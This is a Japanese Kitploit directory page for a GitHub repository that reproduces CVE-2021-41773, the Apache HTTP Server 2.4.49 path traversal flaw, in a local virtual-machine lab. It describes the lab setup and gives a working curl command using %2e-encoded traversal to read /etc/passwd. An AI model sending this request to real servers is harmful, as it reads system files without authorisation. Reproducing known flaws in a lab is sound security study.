Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-41773-POC — Apache HTTP Server 2.4.49 パストラバーサル脆弱性の再現 | Kitploit
ツール/GitHubGitHub/fxdyx-a/cve-2021-41773-poc
偵察脆弱性分析エクスプロイトウェブセキュリティペネトレーションテスト
GitHubfxdyx-a/cve-2021-41773-poc

CVE-2021-41773-POC

Apache HTTP Server 2.4.49 パストラバーサル脆弱性の再現

リポジトリを見る
12ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2021-41773 脆弱性再現レポート

脆弱性の概要

  • CVE ID: CVE-2021-41773
  • 脆弱性名称: Apache HTTP Server パストラバーサル脆弱性
  • リスクレベル: 高 (CVSS 7.5)
  • 影響を受けるバージョン: Apache HTTP Server 2.4.49
  • 脆弱性の説明: Apache HTTP Server 2.4.49 にはパス正規化関数 ap_normalize_path の実装に欠陥があり、攻撃者は %2e エンコードを含む特別なリクエストを構築することでアクセス制御をバイパスし、Web サーバー上の任意のファイルを読み取ることができます。

環境構築

  • オペレーティングシステム: Ubuntu 20.04 (仮想マシン)
  • Webサーバー: Apache httpd 2.4.49 (手動コンパイルインストール)
  • ターゲット環境: 独立実行、ポート 8080 で待ち受け
  • 主要な設定:
    • <Directory /> の Require all denied を Require all granted に変更
    • Alias /vuln を /tmp/vuln_dir に追加し、権限を設定

脆弱性再現

攻撃コマンド

curl -v --path-as-is 'http://127.0.0.1:8080/vuln/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'

攻撃スクリーンショット

/etc/passwd の読み取り成功 /etc/passwd の読み取り成功

ツールをダウンロード